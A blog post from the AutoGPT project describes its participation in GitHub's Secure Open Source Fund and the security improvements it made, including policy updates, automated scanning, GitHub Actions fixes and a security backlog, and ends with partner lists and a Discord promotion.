Open Source

AI Agents

Governance

AutoGPT Joins GitHub’s Secure Open Source Fund (SOSF) to Advance AI Security

AutoGPT Joins GitHub’s Secure Open Source Fund (SOSF) to Advance AI Security

Aug 28, 2025

Otto

Chief Automation Octopus

GitHub Secure Open Source Fund
GitHub Secure Open Source Fund
GitHub Secure Open Source Fund
    Table of contents will appear here.

AutoGPT Joins GitHub’s Secure Open Source Fund (SOSF) to Advance AI Security


AutoGPT was invited to participate in the inaugural session of  GitHub’s Secure Open Source Fund Program (SOSF). Trusted team members Reinier (@pwuts), Bently (@bentlybro), and Nick (@ntindle) attended the sessions in March of this year (2025). Together with many other projects (20+ in our session!), many of which you know (and we use) like shadcn/ui, Node, Next.js, Jupyter, we attended workshops and fireside chats hosted by the GitHub security lab and lovely guest speakers. The SOSF program marked the beginning of another initiative where GitHub pushes security forward in the code we all use and love. You can read more about it here.

What AutoGPT Did to Make AI Agents Safer

#1 Improved Our Security Policies

What We Found

While robust, AutoGPT’s security policies were unprepared to handle the most serious responses from security researchers.

What We Did

We revamped AutoGPT’s security policy and remediation plan, and we also aggressively upskilled in handling security incidents.

#2 Automated Vulnerability Patching 

What We Found

Manually patching security vulnerabilities is time-consuming and not scalable as AutoGPT grows.

What We Did

We set up automation tools like dependabot, CodeQL, and Snyk to regularly scan our codebase and container builds, ensuring they remain up to date and secure.

#3 Resolved Issues with GitHub Action Workflows

What We Found

We had flaws in how we process our GitHub Actions workflows that could have allowed security intrusions.

What We Did

With the help of the GitHub security lab, we resolved the issues in our Actions workflows.

#4 Created a Security Backlog

What We Found

The highest performing security practices are proactive, not reactive. 

What We Did

We created a security backlog and added 20 + items to process as time goes on, such as:

1. Fuzzing GravitasML + joining OSS Fuzz

2. Setting up the OSS Scorecard to automatically verify and validate continuously in GravitasML

3. Setting up zizmor for static analysis of our GitHub Actions

4. Pinning all dependencies

5. Building out Software Bill Of Materials (SBOMs) documents for all of the tools we use and make

Creating Community within the SOSF

As part of the Secure Open Source Fund (SOSF), the AutoGPT team didn’t just attend; we meaningfully contributed. By joining a peer group of maintainers deeply committed to security-first development, we helped create a feedback loop where challenges and lessons are exchanged weekly. This collaborative environment enabled AutoGPT to participate in shaping best practices for bringing fast-growing repositories into compliance with modern security expectations. Besides the security-related benefits, the SOSF program helped AutoGPT build lasting friendships and a robust support network, which some might argue were the most important parts of the project!

Why Security Must Be at the Core of AI

Security is not an add-on feature; it’s a prerequisite for safe, trustworthy innovation, especially in the age of autonomous AI agents and hyper-connected systems. As AI tools like AutoGPT become more deeply integrated into workflows across the internet, any vulnerability can quickly be exploited at a massive scale. That’s why proactive security investments, from policy to automation to community collaboration, are critical for preserving the integrity of the open web. A secure AI ecosystem protects users, accelerates development, and ensures that the future of computing remains safe, transparent, and beneficial to us all.

Thank You’s

We have so many thanks to give to so many people who helped run the program, from the boots-on-the-ground leaders like Gregg and Kevin, to the program ecosystem and funding partners. The GitHub Security Lab teams were instrumental in teaching us all some very new and exciting topics and answering all of Nick's (@ntindle) many questions.

The GitHub security lab team is a fantastic resource for you if you're a maintainer. There's also the GitHub maintainers community you can join at https://maintainers.github.com that will get you going in the right direction.

Partners

Funding Partners: Alfred P. Sloan Foundation, American Express, Chainguard, Datadog, Herodevs, Kraken, Mayfield, Microsoft, Shopify, Stripe, Superbloom, Vercel, Zerodha, 1Password

Ecosystem Partners: Ecosyste.ms, CURIOSS, Digital Data Design Institute Lab for Innovation Science, Digital Infrastructure Insights Fund, Microsoft for Startups, Mozilla, OpenForum Europe, Open Source Collective, OpenUK, Open Technology Fund, OpenSSF, Open Source Initiative, OpenJS Foundation, University of California, Santa Cruz OSPO, Sovereign Tech Agency, SustainOSS

Join 50,000 people

on Discord

Join our vibrant Discord community of 50,000+ members. Connect with co-founders, mentors, and tech enthusiasts. Be part of the backbone of AutoGPT, driving innovation and support.

Join our 50k strong community

Unlock the power of
AI with AutoGPT

Transform your workflow with our cutting-edge AI agents. From automating routine tasks to enhancing customer support and boosting marketing efforts, AutoGPT is your partner in efficiency and innovation.

Get started